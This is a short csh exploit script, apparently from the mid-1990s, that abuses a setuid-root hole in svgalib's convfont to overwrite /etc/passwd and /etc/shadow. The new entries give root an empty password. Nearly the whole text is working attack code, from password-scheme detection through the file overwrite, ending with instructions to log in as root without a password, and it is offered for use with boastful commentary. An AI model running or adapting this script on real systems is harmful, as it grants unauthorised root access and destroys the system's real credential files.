# Gday. This is a small exploit written in csh that uses the bug in 
# convfont where it runs as uid 0. convfont loads in a file and reorders it 
# to form a fontfile. It is possible to define the output of the program.

# This script creates new password (and shadow if neccessary) files, giving 
# the root user no password.

# It has been tested on Slackware 2.0 and Slackware 3.0 setups. If there 
# are any problems then:

# 1) Check to see if convfont is installed (part of the svgalib)
# 2) Check it is setuid root
# 3) Make sure it *is* a Linux system :)

#!/bin/csh

echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"

#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
#      PW_TYPE = "plain" is for a normal /etc/passwd
#      PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo

setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin 
echo " "
echo "determining system type"

if ( -e /etc/shadow ) then		# aha ! is a shadow system
	echo "found a shadow password system. good job we're ueberhackers :)"
	set PW_TYPE = shadow
else
	echo "found a normal password system. make some effort, mr root !"
	set PW_TYPE = plain
endif

set loop = 0
set limit = 100

echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh

if ( $PW_TYPE == "shadow" ) then
	echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
while ( $loop < $limit )
	@ loop++
	echo >> /tmp/passwd "                              "
	echo >> /tmp/shadow "                              "
	echo -n .
end
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"

cp /etc/passwd /tmp/real.passwd

if ( $PW_TYPE == "shadow" ) then
	echo "unable to backup /etc/shadow tho, as it is mode 600"
endif

convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null

if ( $status != 0 ) then
	echo "\!\!\! warning. Something dodgy occured. It could be:"
	echo "    convfont isn't installed"
	echo "    convfont isn't setuid root"
	exit
endif

echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo "                           *******************"
rm -f /tmp/passwd /tmp/shadow